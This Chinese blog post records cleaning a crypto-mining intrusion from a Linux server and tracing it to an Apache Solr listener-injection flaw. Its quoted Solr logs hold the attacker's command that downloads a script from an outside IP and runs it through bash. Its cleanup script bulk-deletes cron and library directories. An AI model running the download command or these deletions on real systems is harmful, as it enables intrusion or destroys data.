1.參考文章:

https://blog.csdn.net/xinxin_2011/article/details/84936581

https://blog.csdn.net/xinxin_2011/article/details/85047245

文章中介紹了入侵后的服務(wù)器的表現(xiàn)以及病毒所在的位置信息，并給出了

處理腳本。在此腳本基礎(chǔ)上稍做了些修改，腳本內(nèi)容如下:

chattr -i /etc

echo "" > /etc/ld.so.preload

rm -rf /etc/cron.d/*

rm -f? /etc/cron.hourly/oanacroner1

chattr +i /etc

chattr -i /var/spool/cron/

rm -rf /var/spool/cron/*

chattr +i /var/spool/cron/

chattr -i /usr/local/lib/*

rm -f /usr/local/lib/*

chattr +i /usr/local/lib

killall sustse

killall kworkerds

rm -f /var/tmp/kworkerds*

rm -f /var/tmp/1.so

rm -f /var/tmp/sustse*

rm -f /tmp/kworkerds*

rm -f /tmp/1.so

rm -f /var/tmp/wc.conf

rm -f /tmp/wc.conf

2.溯源

在使用了第二篇參考文章提供的腳本后，清除了sustse等入侵程序，但是不久后發(fā)現(xiàn)該入侵程序又死灰復(fù)燃，跟參考文章中描述的現(xiàn)象出現(xiàn)不同，遂決定自己查找該程序的入侵方式。

(1).執(zhí)行了last、lastlog 等指令未發(fā)現(xiàn)入侵異常。

(2).檢查了/etc/passwd,/etc/shadow等文件，未發(fā)現(xiàn)添加異常用戶

(3).根據(jù)入侵程序周期性啟動(dòng)的特點(diǎn)，檢查了/etc/cron.*相關(guān)的目錄,在cron.hourly目錄中發(fā)現(xiàn)了入侵腳本oanacroner1，刪除。并修改了處理腳本，添加了rm -f? /etc/cron.hourly/oanacroner1

此時(shí)竊喜一番，認(rèn)為應(yīng)該徹底解決了這個(gè)問(wèn)題，但是沒(méi)過(guò)多久,發(fā)現(xiàn)該程序又出現(xiàn)了。頭大

(4).因?yàn)榉?wù)器上有redis服務(wù)程序，想起redis的未授權(quán)漏洞，但是并未在定時(shí)文件中發(fā)現(xiàn)REDIS字樣?

(漏洞詳見(jiàn):https://www.freebuf.com/vuls/162035.html)

(5) 采用最原始方式:

cd /

grep -r 158.69.133.18 ./*

獲取以下信息:

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO? - 2019-02-12 01:40:19.308; [? beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO? - 2019-02-12 01:40:19.397; [? beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8984-console.log:3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO? org.apache.solr.core.SolrCore? [? beecarry_customer_shard1_replica1] – [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8984-console.log:3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO? org.apache.solr.core.SolrCore? [? beecarry_customer_shard1_replica1] – [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO? - 2019-02-12 01:41:04.474; [? beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO? - 2019-02-12 01:41:04.526; [? beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3712 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO? org.apache.solr.core.SolrCore? [? beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3713 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO? org.apache.solr.core.SolrCore? [? beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

終于找到，原來(lái)利用了solr 的一個(gè)漏洞.

(漏洞詳見(jiàn):https://issues.apache.org/jira/browse/SOLR-11482)

打開(kāi)solr的控制臺(tái)頁(yè)面，在configs/beecarry_customer集群下找到configoverlay.json文件，里面包含了新添加的listener的名字

調(diào)用指令:

curl http://*.*.*.*:8983/solr/beecarry_customer/config -H 'Content-type:application/json' -d '{"delete-listener" : "newlistener-26"}'刪除入侵程序添加的listener

增加防火墻設(shè)置，禁止外網(wǎng)訪問(wèn)solr,執(zhí)行上述腳本，清除本機(jī)的入侵程序，到此徹底解決了這個(gè)問(wèn)題

3.總結(jié)

(1)服務(wù)盡量只在內(nèi)網(wǎng)訪問(wèn)，不對(duì)外網(wǎng)開(kāi)放

(2)修改服務(wù)的配置文件，增加服務(wù)的驗(yàn)證功能

在此記錄了查找入侵程序的過(guò)程，主要是為了給自己留一個(gè)記錄，另外希望給遇到相同問(wèn)題的同學(xué)留一個(gè)參考，希望大家都能找到相應(yīng)的解決方法。